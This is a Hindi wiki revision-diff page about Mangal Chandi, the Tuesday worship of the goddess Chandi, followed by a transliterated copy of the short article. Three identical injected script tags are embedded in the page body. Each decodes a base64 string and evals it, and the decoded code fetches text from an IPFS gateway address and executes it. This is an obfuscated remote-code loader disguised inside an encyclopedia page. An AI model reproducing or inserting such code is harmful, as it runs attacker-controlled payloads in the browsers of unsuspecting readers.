Difference between revisions of "मंगल चण्डी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 3: Line 3:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[मंगलवार]] को चण्डी की पूजा की जाती है; जो सर्वप्रथम [[शिव]] द्वारा सम्पादित हुई थी।  
 
*[[मंगलवार]] को चण्डी की पूजा की जाती है; जो सर्वप्रथम [[शिव]] द्वारा सम्पादित हुई थी।  
*तब मंगल द्वारा, मंगल राजा के द्वारा मंगल को नारियों के द्वारा तथा अच्छे भाग्य के इच्छुक सभी मनुष्यों द्वारा यह पूजा की जाती है।<ref>ब्रह्म वैवर्त (प्रकृति खण्ड, 44|1-41)</ref>
+
*तब मंगल द्वारा, मंगल राजा के द्वारा मंगल को नारियों के द्वारा तथा अच्छे भाग्य के इच्छुक सभी मनुष्यों द्वारा यह पूजा की जाती है।<ref>ब्रह्म वैवर्त (प्रकृति खण्ड, 44|1-41</ref>
 
 
 
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:44, 27 July 2011

chitr:Disamb2.jpg mangal ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- mangal (bahuvikalpi)

[[chitr:Chandi-Devi.jpg|thumb|chandi devi]]

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • mangalavar ko chandi ki pooja ki jati hai; jo sarvapratham shiv dvara sampadit huee thi.
  • tab mangal dvara, mangal raja ke dvara mangal ko nariyoan ke dvara tatha achchhe bhagy ke ichchhuk sabhi manushyoan dvara yah pooja ki jati hai.[1]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. brahm vaivart (prakriti khand, 44|1-41

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>